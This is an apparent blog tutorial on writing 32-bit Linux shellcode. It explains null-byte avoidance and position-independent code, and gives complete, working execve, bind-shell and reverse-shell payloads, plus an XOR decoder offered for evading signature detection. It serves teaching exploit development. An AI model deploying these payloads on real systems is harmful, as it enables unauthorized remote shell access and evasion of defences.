Writing Shellcode for Linux
When you exploit a buffer overflow, you overwrite the return address to hijack the program's execution flow. But redirect it to what? You need code to execute — and that code needs to be small, self-contained, and capable of running anywhere in memory without depending on external libraries or fixed addresses.
That code is shellcode.
In this post, we'll write Linux shellcode from scratch for 32-bit x86 systems. But more importantly, we'll explain why every single line is written the way it is. Why assembly? Why XOR instead of MOV? Why //bin/sh with two slashes? Why does a CALL instruction help us find our string? Every technique has a reason, and understanding those reasons is what separates someone who copies shellcode from someone who can write their own.
Note: This tutorial is for educational purposes — understanding shellcode is essential for both exploit developers and the defenders building protections against them. Always ensure you have proper authorization before testing on any systems.
Prerequisites
Before diving in, you should have a basic understanding of:
- x86 assembly language (registers, stack operations, basic instructions)
- How the stack works (push, pop, ESP, return addresses)
- Linux system calls
- Using a terminal and debugging tools
Environment Setup
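# Install the tools we'll need
# (gcc-multilib lets gcc build 32-bit binaries with -m32 on a 64-bit host)
sudo apt-get update
sudo apt-get install nasm gcc gcc-multilib gdb strace
# Disable ASLR for consistent testing
# (ASLR randomizes memory addresses, making debugging harder)
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
# Re-enable it when you're done (2 is the usual default)
# echo 2 | sudo tee /proc/sys/kernel/randomize_va_space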
Why Assembly?
Shellcode is written in assembly because it needs to be raw machine code — no compiler, no linker, no runtime, no libc. When you inject shellcode into a vulnerable program's memory, there's no loader to resolve function addresses, no dynamic linker to load shared libraries, and no operating system setup to initialize the environment.
You write assembly, assemble it into machine code, and that sequence of bytes runs directly on the CPU. Nothing in between.
High-level languages like C compile into machine code too, but they produce code that depends on:
- The C runtime (startup code, _start, __libc_start_main)
- Shared libraries (libc for printf, system, etc.)
- Fixed memory addresses for global variables
- A properly initialized stack and heap
None of those exist in an exploit scenario. So we go as low as we can — assembly.
How Linux System Calls Work (32-bit)
Everything useful that shellcode does — writing to the screen, spawning a shell, opening a network connection — goes through system calls. Syscalls are the interface between user-space programs and the Linux kernel.
On 32-bit Linux, the calling convention is:
| Register | Purpose |
|---|---|
| EAX | System call number |
| EBX | First argument |
| ECX | Second argument |
| EDX | Third argument |
| ESI | Fourth argument |
| EDI | Fifth argument |
| EBP | Sixth argument |
After loading the registers, you trigger the syscall with int 0x80 — a software interrupt that transfers control to the kernel.
The syscalls we'll use:
| Syscall | Number | Signature |
|---|---|---|
| exit | 1 | exit(int status) |
| write | 4 | write(int fd, char *buf, int len) |
| execve | 11 | execve(char *filename, char **argv, char **envp) |
| dup2 | 63 | dup2(int oldfd, int newfd) |
| socketcall | 102 | socketcall(int call, unsigned long *args) |
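You can find the full list in asm/unistd_32.h under your system's include directory. The exact path varies by distribution: for example /usr/include/asm/unistd_32.h, or /usr/include/x86_64-linux-gnu/asm/unistd_32.h on Debian-based systems.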
Chapter 1: The Simplest Shellcode — exit(0)
Let's start with the absolute simplest shellcode possible: a clean exit.
section .text
global _start
_start:
mov eax, 1 ; syscall number 1 = exit
mov ebx, 0 ; exit status 0 = success
int 0x80 ; trigger the syscall
Assemble, link, and run:
$ nasm -f elf32 exit.asm -o exit.o
$ ld -m elf_i386 exit.o -o exit
$ ./exit
$ echo $?
0
It works. But there's a problem — let's look at the machine code:
$ objdump -d exit -M intel
08048060 <_start>:
8048060: b8 01 00 00 00 mov eax,0x1
8048065: bb 00 00 00 00 mov ebx,0x0
804806a: cd 80 int 0x80
See all those 00 bytes? Those are null bytes, and they're the first enemy of shellcode.
The Null Byte Problem
This is one of the most important concepts in shellcode development, so let's understand it thoroughly.
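Most buffer overflow vulnerabilities involve string functions such as strcpy(), strcat(), and sprintf(). These functions copy data until they encounter a null byte (0x00), which marks the end of the string. (gets() is a related case with a different terminator: it stops at a newline, 0x0a, so there the newline is the byte to avoid.)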
If your shellcode contains a null byte at position 10, the string function stops copying at position 10. Everything after that gets truncated. Your shellcode arrives incomplete, and it won't work.
So every null byte in our shellcode must be eliminated.
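To make the truncation concrete, here is a minimal Python sketch that models what a null-terminated copy would transfer. The helper name simulate_strcpy is made up for this illustration, and the two byte strings are the naive exit(0) encoding from above and a null-free encoding of the same call.

```python
def simulate_strcpy(payload: bytes) -> bytes:
    """Model a C string copy: return everything before the first 0x00."""
    end = payload.find(b"\x00")
    return payload if end == -1 else payload[:end]

# Naive exit(0): mov eax,1 / mov ebx,0 / int 0x80
naive = bytes.fromhex("b801000000" "bb00000000" "cd80")
# Null-free exit(0): xor eax,eax / mov al,1 / xor ebx,ebx / int 0x80
clean = bytes.fromhex("31c0" "b001" "31db" "cd80")

print(len(naive), len(simulate_strcpy(naive)))  # 12 2
print(len(clean), len(simulate_strcpy(clean)))  # 8 8
```

Only the first two bytes of the naive version survive the copy, while the null-free version arrives intact.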
Let's fix our exit shellcode:
section .text
global _start
_start:
xor eax, eax ; EAX = 0 (no null bytes!)
mov al, 1 ; AL = 1 (only sets the lowest byte of EAX)
xor ebx, ebx ; EBX = 0 (exit status)
int 0x80
Let's examine why each change matters:
xor eax, eax instead of mov eax, 0
mov eax, 0 assembles to b8 00 00 00 00 — four null bytes. xor eax, eax assembles to 31 c0 — XOR-ing a register with itself always produces zero, and the instruction contains no null bytes. This is the standard way to zero a register in shellcode.
mov al, 1 instead of mov eax, 1
mov eax, 1 assembles to b8 01 00 00 00 — three null bytes, because EAX is a 32-bit register and the value 1 needs to be zero-padded to 32 bits. But mov al, 1 assembles to b0 01 — only 2 bytes, no nulls. AL is the lowest 8 bits of EAX, and since we already zeroed EAX with XOR, setting AL to 1 makes EAX = 1 without any null bytes.
Let's verify:
$ objdump -d exit -M intel
08048060 <_start>:
8048060: 31 c0 xor eax,eax
8048062: b0 01 mov al,0x1
8048064: 31 db xor ebx,ebx
8048066: cd 80 int 0x80
No null bytes. Eight bytes total. Clean.
Here's a quick reference of null-byte-free alternatives:
| Need | Bad (has nulls) | Good (null-free) |
|---|---|---|
| Set register to 0 | mov eax, 0 | xor eax, eax |
| Set register to small value | mov eax, 5 | xor eax, eax then mov al, 5 |
| Set register to 1 | mov eax, 1 | xor eax, eax then inc eax |
| Push 0 to stack | push 0 | xor eax, eax then push eax |
Chapter 2: Hello World Shellcode
Now let's write something that produces visible output — printing "Hello World!" using the write syscall.
The Naive Version
section .text
global _start
_start:
; write(1, "Hello World!\n", 13)
mov eax, 4 ; syscall 4 = write
mov ebx, 1 ; file descriptor 1 = stdout
mov ecx, msg ; pointer to the message
mov edx, 13 ; message length
int 0x80
; exit(0)
mov eax, 1
mov ebx, 0
int 0x80
section .data
msg db 'Hello World!', 0xa ; 0xa = newline
This works as a standalone program, but it cannot work as shellcode. Why?
The msg label is in the .data section, and mov ecx, msg gets assembled as mov ecx, 0x080490a4 — a hardcoded memory address. When this shellcode runs inside an exploited program, that address points to something completely different (or invalid). The shellcode crashes.
This is the position-independence problem.
Position-Independent Code — The JMP-CALL-POP Trick
Shellcode doesn't know where in memory it will land. It might be injected into a stack buffer at 0xbffff000 one time and 0xbfffe800 the next (especially with ASLR). So it cannot use any hardcoded addresses.
But we still need to reference data — our "Hello World!" string has to live somewhere, and we need its address. How do we get the address of something when we don't know where we are in memory?
The answer is the JMP-CALL-POP technique, and it's one of the most elegant tricks in shellcode development.
Here's how it works:
- JMP forward to a CALL instruction at the end of the shellcode
- The CALL instruction jumps back to the shellcode's main body
- CALL has a critical side effect: it pushes the return address onto the stack — and the return address is the address of the instruction right after the CALL
- We place our string data right after the CALL instruction
- A POP instruction retrieves that address from the stack
┌──────── JMP to call_shellcode ───────────┐
│ │
▼ │
shellcode: │
POP ECX ◄── ECX now has address of msg │
...code... │
...code... │
│
call_shellcode: ◄───────────┘
CALL shellcode ──► pushes address of next byte onto stack
db 'Hello World!', 0xa ◄── this address gets pushed!
When CALL shellcode executes, the CPU pushes the address of the next byte (the start of "Hello World!") onto the stack, then jumps to the shellcode label. The first instruction there is POP ECX, which grabs that address. Now ECX points to our string, regardless of where in memory the shellcode was loaded.
The Position-Independent Version
section .text
global _start
_start:
jmp short call_shellcode ; Step 1: jump to the CALL
shellcode:
pop ecx ; Step 3: ECX = address of "Hello World!\n"
; write(1, ecx, 13)
xor eax, eax
mov al, 4 ; syscall 4 = write
xor ebx, ebx
mov bl, 1 ; fd 1 = stdout
xor edx, edx
mov dl, 13 ; length = 13
int 0x80
; exit(0)
xor eax, eax
mov al, 1 ; syscall 1 = exit
xor ebx, ebx ; status = 0
int 0x80
call_shellcode:
call shellcode ; Step 2: pushes address of msg, jumps back
db 'Hello World!', 0xa ; Our string data — right after the CALL
Notice:
- Every register is zeroed with XOR before use (no null bytes)
- Values are set using AL, BL, DL (8-bit registers) instead of full 32-bit MOV
- The string is not in a .data section; it's embedded directly in the .text section, right after the CALL instruction
- No hardcoded addresses anywhere
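As a sanity check on the listing above, the two relative displacements can be worked out by hand. The sketch below is only arithmetic on instruction sizes read off that listing (one 1-byte POP followed by eleven 2-byte instructions); the variable names are illustrative.

```python
import struct

# Sizes of the instructions between the JMP and the CALL, per the listing:
# pop ecx (1 byte) followed by eleven 2-byte instructions.
body_sizes = [1] + [2] * 11
JMP_SHORT_LEN = 2   # opcode EB + 8-bit displacement
CALL_LEN = 5        # opcode E8 + 32-bit displacement

body_len = sum(body_sizes)              # 23
shellcode_off = JMP_SHORT_LEN           # offset of the "shellcode" label
call_off = JMP_SHORT_LEN + body_len     # offset of the "call_shellcode" label

# Displacements are measured from the address of the NEXT instruction.
jmp_rel = call_off - JMP_SHORT_LEN                  # forward jump
call_rel = shellcode_off - (call_off + CALL_LEN)    # backward call

jmp_bytes = b"\xeb" + struct.pack("<b", jmp_rel)
call_bytes = b"\xe8" + struct.pack("<i", call_rel)
print(jmp_bytes.hex(), call_bytes.hex())  # eb17 e8e4ffffff
```

The backward CALL is what keeps the encoding null-free: a small negative 32-bit displacement is padded with 0xff bytes, whereas a small forward CALL would be padded with 0x00 bytes.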
Extracting and Testing the Shellcode
# Assemble and link
$ nasm -f elf32 hello.asm -o hello.o
$ ld -m elf_i386 hello.o -o hello
# Test as standalone
$ ./hello
Hello World!
# Extract the raw bytes
$ objdump -d hello | grep -Po '\s\K[a-f0-9]{2}(?=\s)' | sed 's/^/\\x/' | tr -d '\n'
Now we need a way to test these bytes as actual injected shellcode. We write a C test harness — a program that treats the shellcode bytes as executable code:
#include <stdio.h>
#include <string.h>
// The shellcode bytes extracted from objdump.
// Note: on some newer kernels, -z execstack may make only the stack
// executable, not global data. If the call below segfaults, try declaring
// this array inside main() so that it lives on the stack.
unsigned char shellcode[] =
    "\xeb\x17" // jmp short call_shellcode (skips the 23-byte body)
    "\x59" // pop ecx
    "\x31\xc0" // xor eax, eax
    "\xb0\x04" // mov al, 4
    "\x31\xdb" // xor ebx, ebx
    "\xb3\x01" // mov bl, 1
    "\x31\xd2" // xor edx, edx
    "\xb2\x0d" // mov dl, 13
    "\xcd\x80" // int 0x80
    "\x31\xc0" // xor eax, eax
    "\xb0\x01" // mov al, 1
    "\x31\xdb" // xor ebx, ebx
    "\xcd\x80" // int 0x80
    "\xe8\xe4\xff\xff\xff" // call shellcode (rel32 = -28)
    "Hello World!\x0a"; // the string data
int main(void) {
    // %zu is the portable format for size_t, the type strlen() returns
    printf("Shellcode length: %zu\n", strlen((char *)shellcode));
    // Cast the shellcode array to a function pointer and call it
    int (*ret)(void) = (int (*)(void))shellcode;
    ret();
    return 0;
}
# Compile with protections disabled
$ gcc -fno-stack-protector -z execstack -m32 test.c -o test
# Run
$ ./test
Shellcode length: 43
Hello World!
Why the special GCC flags?
- -fno-stack-protector: Disables stack canaries (which would detect our buffer overflow in a real exploit)
- -z execstack: Makes the stack executable (modern systems mark the stack as non-executable by default, which prevents shellcode from running)
- -m32: Compiles for 32-bit (since our shellcode is 32-bit)
Chapter 3: Spawning a Shell — execve("/bin/sh")
This is the shellcode that gives "shellcode" its name — code that spawns a shell. The goal is to call:
execve("/bin/sh", ["/bin/sh", NULL], NULL)
This replaces the current process with /bin/sh, giving the attacker an interactive shell. Let's understand the execve syscall first.
Understanding execve
int execve(const char *filename, char *const argv[], char *const envp[]);
- filename (EBX): Pointer to a null-terminated string: "/bin/sh\0"
- argv (ECX): Pointer to an array of argument strings, terminated by NULL: ["/bin/sh", NULL]
- envp (EDX): Pointer to the environment variables array, terminated by NULL. We'll use NULL
So we need to construct, entirely on the stack:
- The string "/bin/sh" followed by a null byte
- An array containing a pointer to that string, followed by a NULL pointer
- The appropriate register values
The Stack Layout
Here's what we need in memory:
Low Address
┌─────────────────────┐
ESP ──► │ ptr to "//bin/sh" │ ◄── argv[0]
├─────────────────────┤
│ NULL (0x00000000) │ ◄── argv[1] (terminates argv)
├─────────────────────┤
EBX ──► │ "//bi" (0x69622f2f) │ ◄── start of string
├─────────────────────┤
│ "n/sh" (0x68732f6e) │
├─────────────────────┤
│ NULL (0x00000000) │ ◄── string terminator
└─────────────────────┘
High Address
Wait — why "//bin/sh" with two slashes instead of "/bin/sh"?
Why "//bin/sh" Instead of "/bin/sh"
"/bin/sh" is 7 characters, which does not divide evenly into the 4-byte (32-bit) values that PUSH places on the stack. Packing it into two pushes leaves one byte to fill, and filling it with the string's null terminator (push 0x0068732f) would put a 0x00 byte into the shellcode itself.
"//bin/sh" is 8 characters: exactly two 4-byte pushes, with no null byte in either immediate. Linux treats multiple consecutive slashes in a path as a single slash, so //bin/sh resolves to the same file as /bin/sh. The null terminator is supplied separately by pushing a zeroed register, which places zeros on the stack without encoding any in the instruction stream.
"//bin/sh" in memory (little-endian):
PUSH 0x68732f6e → "n/sh" (pushed first, ends up at higher address)
PUSH 0x69622f2f → "//bi" (pushed second, ends up at lower address)
Reading from low to high: "//bi" + "n/sh" = "//bin/sh" ✓
Remember — the stack grows downward, but strings are read forward (low to high). So we push the end of the string first.
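The push constants can be derived mechanically rather than by hand. Here is a small Python sketch, assuming the string length is already a multiple of 4; push_dwords is a hypothetical helper name, not part of any tool.

```python
import struct

def push_dwords(s: bytes) -> list:
    """Split s into 4-byte chunks and return PUSH immediates, last chunk first."""
    if len(s) % 4 != 0:
        raise ValueError("length must be a multiple of 4 (pad the path, e.g. with an extra '/')")
    chunks = [s[i:i + 4] for i in range(0, len(s), 4)]
    # "<I" reads each chunk as a little-endian 32-bit value: the immediate
    # that reproduces those four bytes in memory when pushed.
    return [f"0x{struct.unpack('<I', c)[0]:08x}" for c in reversed(chunks)]

for imm in push_dwords(b"//bin/sh"):
    print(f"push {imm}")
# push 0x68732f6e
# push 0x69622f2f
```

Reversing the chunk order is the code equivalent of "push the end of the string first".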
The Assembly
section .text
global _start
_start:
; === Step 1: Clear all registers ===
; We don't know what's in these registers when our shellcode runs.
; Starting with known zero values is critical.
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
; === Step 2: Push the string "//bin/sh\0" onto the stack ===
push eax ; Push 0x00000000 — this is the null terminator
; for our string. We can't embed \x00 in the
; shellcode bytes, but pushing a zeroed register
; puts null bytes on the STACK, which is fine.
push 0x68732f6e ; Push "n/sh" (little-endian)
push 0x69622f2f ; Push "//bi" (little-endian)
; Now ESP points to "//bin/sh\0" on the stack
mov ebx, esp ; EBX = pointer to filename "//bin/sh"
; === Step 3: Build the argv array ===
; argv must be: [pointer_to_string, NULL]
; This is also built on the stack
push eax ; Push NULL — this terminates the argv array
push ebx ; Push pointer to "//bin/sh" — this is argv[0]
; Now ESP points to the argv array: [ptr, NULL]
mov ecx, esp ; ECX = pointer to argv array
; === Step 4: Set EDX (envp) ===
; EDX is already 0 (NULL) from the XOR above — no environment variables
; mov edx, eax ; (already zero, but shown for clarity)
; === Step 5: Make the syscall ===
mov al, 11 ; syscall 11 = execve
; We use AL (not EAX) to avoid null bytes
int 0x80 ; Transfer control to the kernel
; If execve succeeds, this process is replaced
; by /bin/sh — we never return here
Let's trace through the stack state at each step:
After "xor" instructions:
EAX=0, EBX=0, ECX=0, EDX=0
After "push eax":
Stack: [0x00000000]
ESP ──► ^
After "push 0x68732f6e":
Stack: [0x68732f6e] [0x00000000]
ESP ──► ^
After "push 0x69622f2f":
Stack: [0x69622f2f] [0x68732f6e] [0x00000000]
ESP ──► ^
Reading as string from ESP: "//bin/sh\0" ✓
After "mov ebx, esp":
EBX ──► "//bin/sh\0"
After "push eax" (NULL for argv terminator):
Stack: [0x00000000] [0x69622f2f] [0x68732f6e] [0x00000000]
ESP ──► ^
After "push ebx" (pointer to string):
Stack: [ptr_to_str] [0x00000000] [0x69622f2f] [0x68732f6e] [0x00000000]
ESP ──► ^
After "mov ecx, esp":
ECX ──► [ptr_to_str, NULL] (this is argv)
EBX ──► "//bin/sh\0" (this is filename)
EDX = 0 (this is envp = NULL)
EAX = 11 (syscall number)
execve("/bin/sh", ["/bin/sh", NULL], NULL) ✓
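The same trace can be replayed in a toy model. The sketch below simulates a descending 32-bit stack in a Python bytearray; the Stack class and its addresses are purely illustrative offsets into that array, not real process addresses.

```python
import struct

class Stack:
    """Toy model of a descending 32-bit stack backed by a bytearray."""
    def __init__(self, size=64):
        self.mem = bytearray(size)
        self.esp = size                  # empty stack: ESP at the top

    def push(self, value):
        self.esp -= 4                    # the stack grows toward lower addresses
        self.mem[self.esp:self.esp + 4] = struct.pack("<I", value)
        return self.esp                  # new ESP, handy for "mov reg, esp"

    def cstring(self, addr):
        end = self.mem.index(0, addr)    # read up to the first null byte
        return bytes(self.mem[addr:end])

st = Stack()
st.push(0)                    # push eax  (string terminator)
st.push(0x68732f6e)           # "n/sh"
ebx = st.push(0x69622f2f)     # "//bi", then mov ebx, esp
st.push(0)                    # push eax  (argv terminator)
ecx = st.push(ebx)            # push ebx, then mov ecx, esp

argv0, argv1 = struct.unpack_from("<II", st.mem, ecx)
print(st.cstring(ebx), argv0 == ebx, argv1)  # b'//bin/sh' True 0
```

Reading forward from EBX yields the path, and ECX points at a two-entry array whose first slot holds EBX and whose second is NULL.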
Compile and Test
$ nasm -f elf32 shell.asm -o shell.o
$ ld -m elf_i386 shell.o -o shell
$ ./shell
$ whoami
user
$ exit
You get a shell. The shellcode is 29 bytes, small enough to fit in most buffer overflow exploits.
Check for Null Bytes
$ objdump -d shell -M intel
08048060 <_start>:
8048060: 31 c0 xor eax,eax
8048062: 31 db xor ebx,ebx
8048064: 31 c9 xor ecx,ecx
8048066: 31 d2 xor edx,edx
8048068: 50 push eax
8048069: 68 6e 2f 73 68 push 0x68732f6e
804806e: 68 2f 2f 62 69 push 0x69622f2f
8048073: 89 e3 mov ebx,esp
8048075: 50 push eax
8048076: 53 push ebx
8048077: 89 e1 mov ecx,esp
8048079: b0 0b mov al,0xb
804807b: cd 80 int 0x80
No 00 bytes anywhere. This shellcode can pass intact through strcpy() and other functions that stop at a null byte. It also contains no 0x0a byte, so gets() will not cut it short either.
Chapter 4: TCP Bind Shell
A bind shell is shellcode that opens a port on the target machine and waits for the attacker to connect. When someone connects, they get a shell. This is useful when the target is directly reachable from the attacker's network.
The C equivalent of what we're building:
int sockfd = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(4444);
addr.sin_addr.s_addr = INADDR_ANY;
bind(sockfd, (struct sockaddr *)&addr, sizeof(addr));
listen(sockfd, 0);
int clientfd = accept(sockfd, NULL, NULL);
// Redirect stdin/stdout/stderr to the socket
dup2(clientfd, 0); // stdin
dup2(clientfd, 1); // stdout
dup2(clientfd, 2); // stderr
execve("/bin/sh", ["/bin/sh", NULL], NULL);
That's six steps: socket, bind, listen, accept, dup2 (×3), then execve. In 32-bit Linux, all socket operations go through a single syscall, socketcall (number 102). The first argument (EBX) specifies which socket operation, and the second argument (ECX) is a pointer to the operation's arguments on the stack.
| EBX Value | Operation |
|---|---|
| 1 | SYS_SOCKET |
| 2 | SYS_BIND |
| 3 | SYS_CONNECT |
| 4 | SYS_LISTEN |
| 5 | SYS_ACCEPT |
The Assembly — With Explanations
section .text
global _start
_start:
; ============================================
; socket(AF_INET, SOCK_STREAM, 0)
; ============================================
; Creates a TCP socket. Returns a file descriptor in EAX.
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov al, 102 ; syscall 102 = socketcall
mov bl, 1 ; SYS_SOCKET
; Build the argument array on the stack (pushed in reverse order)
push edx ; protocol = 0 (kernel picks TCP for SOCK_STREAM)
push 1 ; SOCK_STREAM (TCP)
push 2 ; AF_INET (IPv4)
mov ecx, esp ; ECX = pointer to arguments
int 0x80 ; Returns socket fd in EAX
mov esi, eax ; Save the socket fd in ESI (we'll need it later)
; ============================================
; bind(sockfd, {AF_INET, 4444, 0.0.0.0}, 16)
; ============================================
; Binds the socket to port 4444 on all interfaces.
; We need to build a sockaddr_in struct on the stack.
xor eax, eax
mov al, 102 ; socketcall
mov bl, 2 ; SYS_BIND
; Build sockaddr_in struct on the stack
push edx ; sin_addr = 0.0.0.0 (INADDR_ANY — listen on all interfaces)
push word 0x5c11 ; sin_port = 4444 in network byte order (big-endian)
; 4444 decimal = 0x115C, so memory must hold the bytes 11 5C;
; little-endian x86 writes exactly those bytes for the word 0x5C11
push word 2 ; sin_family = AF_INET
mov ecx, esp ; ECX points to our sockaddr_in struct
; Build the argument array for bind()
push 16 ; addrlen = sizeof(sockaddr_in) = 16
push ecx ; pointer to sockaddr_in struct
push esi ; socket fd
mov ecx, esp ; ECX = pointer to arguments
int 0x80
; ============================================
; listen(sockfd, 0)
; ============================================
; Marks the socket as a passive socket that accepts connections.
; Backlog of 0 means only one pending connection at a time.
xor eax, eax
mov al, 102 ; socketcall
mov bl, 4 ; SYS_LISTEN
push edx ; backlog = 0
push esi ; socket fd
mov ecx, esp
int 0x80
; ============================================
; accept(sockfd, NULL, NULL)
; ============================================
; Waits for an incoming connection. Blocks until someone connects.
; Returns a NEW file descriptor for the connected client.
xor eax, eax
mov al, 102 ; socketcall
mov bl, 5 ; SYS_ACCEPT
push edx ; addrlen = NULL (we don't care who connected)
push edx ; addr = NULL
push esi ; socket fd
mov ecx, esp
int 0x80
mov ebx, eax ; Save client fd in EBX (needed for dup2)
; ============================================
; dup2(clientfd, 0/1/2) — redirect I/O to the socket
; ============================================
; This is the critical step. We redirect stdin (0), stdout (1),
; and stderr (2) to the client socket. After this, anything the
; shell reads comes from the network, and anything it writes
; goes back over the network.
;
; Without this step, the shell would read from the target's
; terminal and write to the target's terminal — useless to us.
xor ecx, ecx ; ECX = 0 (start with stdin)
dup_loop:
xor eax, eax
mov al, 63 ; syscall 63 = dup2
int 0x80 ; dup2(clientfd, ecx)
inc ecx ; next fd (0 → 1 → 2)
cmp cl, 3 ; done all three?
jne dup_loop ; if not, loop
; ============================================
; execve("//bin/sh", ["//bin/sh", NULL], NULL)
; ============================================
; Same technique as Chapter 3 — push string on stack, set up argv.
xor eax, eax
push eax ; null terminator for string
push 0x68732f6e ; "n/sh"
push 0x69622f2f ; "//bi"
mov ebx, esp ; EBX = pointer to "//bin/sh"
push eax ; argv terminator (NULL)
push ebx ; argv[0] = pointer to "//bin/sh"
mov ecx, esp ; ECX = pointer to argv
mov edx, eax ; EDX = NULL (no environment variables)
mov al, 11 ; syscall 11 = execve
int 0x80
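The port constant in the listing is easy to get backwards, so it can help to derive it rather than trust mental arithmetic. A short Python sketch follows; port_push_word is a hypothetical helper name.

```python
import struct

def port_push_word(port: int) -> int:
    """Return the 16-bit immediate that stores `port` in network byte order."""
    net = struct.pack("!H", port)        # big-endian bytes, as they must sit in memory
    return struct.unpack("<H", net)[0]   # the value a little-endian CPU writes as those bytes

imm = port_push_word(4444)
print(hex(imm), struct.pack("!H", 4444).hex())  # 0x5c11 115c

# A port whose two bytes include 0x00 would put a null into the shellcode:
print(b"\x00" in struct.pack("!H", 256))        # True  (256 = 0x0100)
```

The second check shows why the port is a constraint too: a port such as 256 would reintroduce a null byte.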
Test It
# Compile
$ nasm -f elf32 bind_shell.asm -o bind_shell.o
$ ld -m elf_i386 bind_shell.o -o bind_shell
# Terminal 1 — run the bind shell
$ ./bind_shell
# Terminal 2 — connect to it
$ nc localhost 4444
whoami
user
id
uid=1000(user) gid=1000(user) groups=1000(user)
You now have a remote shell over the network.
Chapter 5: TCP Reverse Shell
A bind shell waits for connections on the target. But what if the target is behind a firewall that blocks incoming connections? The answer is a reverse shell — the target connects back to the attacker.
The difference from the bind shell lies in the middle of the sequence:
| Bind Shell | Reverse Shell |
|---|---|
| socket() | socket() |
| bind() | connect() |
| listen() | (not needed) |
| accept() | (not needed) |
| dup2() ×3 | dup2() ×3 |
| execve() | execve() |
Instead of bind + listen + accept, we use a single connect() to reach the attacker's machine. Much simpler.
section .text
global _start
_start:
; ============================================
; socket(AF_INET, SOCK_STREAM, 0)
; ============================================
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov al, 102 ; socketcall
mov bl, 1 ; SYS_SOCKET
push edx ; protocol = 0
push 1 ; SOCK_STREAM
push 2 ; AF_INET
mov ecx, esp
int 0x80
mov esi, eax ; save socket fd
; ============================================
; connect(sockfd, {AF_INET, 4444, 127.0.0.1}, 16)
; ============================================
; Connect back to the attacker's machine.
; Change the IP address to your attacker machine's IP.
xor eax, eax
mov al, 102 ; socketcall
mov bl, 3 ; SYS_CONNECT
; Build sockaddr_in on the stack
push 0x0100007f ; sin_addr = 127.0.0.1 in network byte order
; 127 = 0x7f, 0 = 0x00, 0 = 0x00, 1 = 0x01
; Stored as: 0x0100007f (little-endian representation
; of the big-endian IP)
;
; WARNING: This contains null bytes (0x00)!
; For a real exploit, you'd need a different IP
; like 10.10.10.1 (0x010a0a0a) that has no nulls.
push word 0x5c11 ; sin_port = 4444
push word 2 ; sin_family = AF_INET
mov ecx, esp
push 16 ; addrlen
push ecx ; sockaddr struct
push esi ; socket fd
mov ecx, esp
int 0x80
; ============================================
; dup2(sockfd, 0/1/2)
; ============================================
mov ebx, esi ; socket fd (the CONNECTED socket, not a client fd)
xor ecx, ecx
dup_loop:
xor eax, eax
mov al, 63
int 0x80
inc ecx
cmp cl, 3
jne dup_loop
; ============================================
; execve("//bin/sh", ["//bin/sh", NULL], NULL)
; ============================================
xor eax, eax
push eax
push 0x68732f6e
push 0x69622f2f
mov ebx, esp
push eax
push ebx
mov ecx, esp
mov edx, eax
mov al, 11
int 0x80
Test It
# Terminal 1 — attacker listens for the callback
$ nc -lvp 4444
Listening on 0.0.0.0 4444
# Terminal 2 — run the reverse shell (on the "target")
$ ./reverse_shell
# Back in Terminal 1 — a shell appears
Connection received on 127.0.0.1 54321
whoami
user
About the null bytes in the IP address: 127.0.0.1 contains null bytes (0x00). In a real exploit, you'd use an attacker IP that doesn't contain null bytes (like 10.10.10.1 = 0x010a0a0a), or encode the shellcode to avoid the issue.
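Whether a given address is null-free can be checked before assembling anything. Here is a minimal Python sketch using the standard socket.inet_aton; the helper names ip_push_dword and has_null are made up for this example.

```python
import socket
import struct

def ip_push_dword(ip: str) -> int:
    """Return the 32-bit immediate that stores `ip` in network byte order when pushed."""
    net = socket.inet_aton(ip)            # four bytes in network (big-endian) order
    return struct.unpack("<I", net)[0]

def has_null(ip: str) -> bool:
    """True if any octet of the address is zero."""
    return b"\x00" in socket.inet_aton(ip)

for ip in ("127.0.0.1", "10.10.10.1"):
    status = "null bytes" if has_null(ip) else "null-free"
    print(ip, f"0x{ip_push_dword(ip):08x}", status)
# 127.0.0.1 0x0100007f null bytes
# 10.10.10.1 0x010a0a0a null-free
```

Note that 10.10.10.1 is null-free but contains 0x0a, which matters when newline is also a bad character.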
Shellcode Optimization Techniques
Size Matters
Smaller shellcode = more likely to fit in the available buffer. Every byte counts. Some tricks:
; Instead of two instructions to zero and set:
xor eax, eax ; 2 bytes
mov al, 11 ; 2 bytes (total: 4 bytes)
; Sometimes you can use:
push 11 ; 2 bytes
pop eax ; 1 byte (total: 3 bytes)
; CDQ sign-extends EAX into EDX:EAX, so EDX becomes 0
; whenever EAX is non-negative (bit 31 clear)
xor eax, eax ; 2 bytes
cdq ; 1 byte — EDX is now 0 too (saves "xor edx, edx")
; MUL: multiplying by zero zeroes both EAX and EDX
xor ecx, ecx ; 2 bytes
mul ecx ; 2 bytes — EAX=0, EDX=0 (zeroed two registers with one trick)
Polymorphic Shellcode
Advanced shellcode can encode itself to evade signature-based detection. A small decoder stub at the beginning decodes the rest of the shellcode at runtime:
decoder:
jmp short get_shellcode
decode:
pop esi ; ESI = address of encoded shellcode
xor ecx, ecx
mov cl, SHELLCODE_LEN ; length of encoded shellcode
decode_loop:
xor byte [esi], 0xAA ; XOR each byte with key 0xAA
inc esi
loop decode_loop
jmp short encoded_shellcode
get_shellcode:
call decode
encoded_shellcode:
; ... XOR-encoded bytes here ...
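The encoded bytes look nothing like the original, so a signature written for the original shellcode will not match them. At runtime, the decoder XORs each byte with the key to restore the real shellcode in place (so the memory holding it must be writable), then jumps to it. Two caveats: the key must not equal any byte of the original shellcode, because a byte XORed with itself becomes 0x00 and reintroduces a null; and a fixed decoder stub is itself recognizable, which is why fully polymorphic engines also vary the stub.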
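The property the decoder relies on is that XOR with a fixed key is its own inverse. The sketch below shows that round trip on a neutral sample string standing in for the bytes to encode; xor_bytes and key_is_safe are illustrative names.

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key; applying it twice restores the input."""
    return bytes(b ^ key for b in data)

def key_is_safe(data: bytes, key: int) -> bool:
    """A byte equal to the key encodes to 0x00, so such a key is unusable."""
    return key not in data

sample = b"Hello World!\n"   # neutral stand-in for the bytes to encode
KEY = 0xAA

encoded = xor_bytes(sample, KEY)
print(xor_bytes(encoded, KEY) == sample)               # True
print(key_is_safe(sample, KEY), b"\x00" in encoded)    # True False
print(key_is_safe(b"\xaa\x01", KEY))                   # False
```

The last line shows the failure case: input that contains the key byte would encode to a null.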
Testing and Debugging
Using GDB
GDB is essential for stepping through shellcode instruction by instruction:
$ gdb ./test
